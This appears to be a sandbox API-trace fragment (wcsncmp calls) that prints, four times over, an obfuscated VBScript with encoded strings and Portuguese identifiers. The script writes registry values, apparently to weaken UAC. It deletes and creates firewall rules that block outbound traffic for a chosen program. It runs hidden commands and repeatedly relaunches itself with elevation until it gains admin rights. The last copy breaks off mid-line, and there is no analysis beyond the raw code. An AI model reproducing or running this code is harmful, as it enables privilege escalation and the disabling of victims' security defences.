bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.319] wcsncmp (_String1="iarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.319] wcsncmp (_String1="arregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.319] wcsncmp (_String1="rregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.319] wcsncmp (_String1="regra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", 